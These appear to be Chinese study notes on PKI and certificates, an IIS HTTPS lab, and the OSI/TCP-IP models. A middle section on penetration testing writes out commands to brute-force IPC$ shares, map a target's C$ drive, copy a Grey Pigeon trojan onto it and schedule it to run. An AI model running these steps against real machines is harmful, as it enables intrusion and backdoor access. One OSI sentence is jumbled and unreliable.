PKI
一、 PKI概述
1、名称
Public Key Infrastructure:公钥基础设施
2、作用
通过加密技术和数字签名保证信息的安全
3、组成
公钥加密技术、数字证书、CA、RA
二、信息安全三要素
机密性
完整性
身份验证/操作的不可否认性
三、哪些IT领域用到PKI:
1、SSL/HTTPS
2、IPsecVPN
3、部分远程访问VPN
四、公钥加密技术
1、作用:实现对信息加密、数字签名等安全保障
2、加密算法:
(1)对称加密算法
加解密的密钥一致!
DES 3DES AES
(2)非对称加密算法
通信双方各自产生一对公私钥。
双方各自交换公钥
公钥和私钥为互相加解密关系!
公私钥不可互相逆推!
RSA DH
(3)例如
x+5=y(对称加密算法)
x是原数据/原文
y是密文
5是key/密钥
(4)HASH算法:MD5 SHA (验证完整性)
HASH值不可逆!
HASH值=摘要
(5)数字签名:
用自己的私钥对摘要加密得出的密文就是数字签名
(6)证书:
①证书用于保证公密的合法性
②证书格式遵循X.509标准
③数字证书包含信息:
使用者的公钥值
使用者标识信息(如名称和电子邮件地址)
有效期(证书的有效时间)
颁发者标识信息
颁发者的数字签名
④数字证书由权威公正的第三方机构即CA签发
⑤CA是权威证书颁发机构,为了公正"公钥"的合法性!
⑥机密性:使用对方的公钥加密!
⑦身份验证/数字签名:使用自己的私钥!
五、实验
1、实验名称:部署HTTPS服务器,也叫SSL服务器
2、实验环境:
1)win2008作为https服务器:10.1.1.2/24
2)win7作为客户机:10.1.1.1/24
3)桥接到虚拟网络vmenet1
3、实验步骤:
(1)配置服务器IP地址10.1.1.2/24。
(2)安装IIS服务 并建立一个站点。(必须使用域名)并配置DNS服务器,并初步验证访问http://www.flower.com一下。
(3)安装CA组件
(4)打开IIS,先生成证书申请文件
(5)向CA申请证书:
打开网页http://10.1.1.2/certsrv并向CA发送web服务器申请文件
(6)CA颁发证书
(7)在web服务器上下载证书并完成安装
(8)在web服务器上启用SSL443
(9)要求用户必须使用443访问,不能使用80访问!
(10)在客户端上修改hosts文件,并验证
渗透简单测试
一、步骤
0.授权
1.信息收集
nslookup whois
2.扫描漏洞
namp=ip范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0
扫描网站漏洞
3.漏洞利用
4.提权(shell环境、桌面环境、最高权限)
5.毁尸灭迹(自首)
6.留后门(跟狱友搞好关系)
7.渗透测试报告(努力立功,争取减刑出狱)
二、手工探测端口号开放
格式:telnet IP地址 探测端口
1.使用 scanport 软件 扫描445端口
2.漏洞利用之IPC$:
进行暴力破解:NTscan(只能针对445端口进行暴力破解)
3.命令
命令:net use \\10.1.1.2\ipc$ 密码 /user:用户名
作用:建立空链接,控制整个电脑的文件,ipc$ 不针对某一个盘,链接之后,目标主机的所有的盘都能在本机使用
net use f: \ \10.1.1.2\share 密码 /user:用户名
作用:将 10.1.1.2\share 共享文件夹映射到本机的 f 盘
net use f: /del
作用:删掉本地的 f 盘映射
net use * /del
作用:删掉所有映射
net use f: \ \10.1.1.2\c$ 密码 /user:用户名
作用:将 10.1.1.2 的 C盘 映射为本机的 f 盘
4.制作木马
利用光盘上的灰鸽子软件
5.植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
作用:将本机的 d:\heihei.exe 拷贝到 10.1.1.2 的 c 盘下
6.设置计划任务自动执行木马
命令:net time \\10.1.1.2
作用:查看对方电脑时间
命令:at \\10.1.1.2 11:11 "c:\heihei.exe"
作用:在对方电脑上定时启动指定应用程序
7.等待肉鸡上线
OSI与TCP-IP5层协议
一、分层思想
1、由通信需求而产生了定义协议标准
2、分层思想的概念
将复杂的流程分解为几个功能相对单一的子过程(将复杂问题简单化)
整个流程更加清晰,复杂问题简单化
更容易发现问题并针对性的解决问题
使用网络的人未必知道数据的传输过程
3、OSI七层模型
(1)通信
(2)协议:通信的双方需要"讲"相同的语言
(3)协议分层:网络通信的过程是开放很复杂的,为通信系了降低复统互联杂性参考
(4)OSI七层模型:1974年,ISO组织发布了OSI参考模型
OSI(Open System interconnection):是开放的通信系统互联参考模型
(5)特点:同层使用相同协议,下层为上层提供服务
二、数据的封装与解封装过程
TCP/UDP 头:包含了源端口号和目标端口号
IP 包头:包含了源IP和目标IP
注:端口号只有应用层才有。
传输层:完成进程到进程的通信
UDP特点:速度快,安全性低,无连接服务
TCP特点:速度慢,安全性高,提供可靠的数据传输(与对方建立连接)
网络层:完成点(电脑)到点(电脑)的通信
交换机工作在数据链路层,而交换机一般不认识IP地址,所以需要加MAC子层,其中包含两个重要的值:源MAC地址和目标MAC地址,这俩值主要就是给交换机看的
FCS:检验前面的数据是否有改变和丢失,是一种校验手段,4个字节
三、OSI模型和TCP/IP模型
7层模型中的 表示层和会话层的协议比较少,直接并到应用层了,就成了 5层模型。
网络层有个非常重要的协议叫 IP 协议。
传输层有个非常重要的协议叫 TCP 协议
数据封装示意图:
8bit = 1Byte字节
注:凡是跟厂家有关系的,都是按照 bit 算的,只有电脑是按照Byte算的。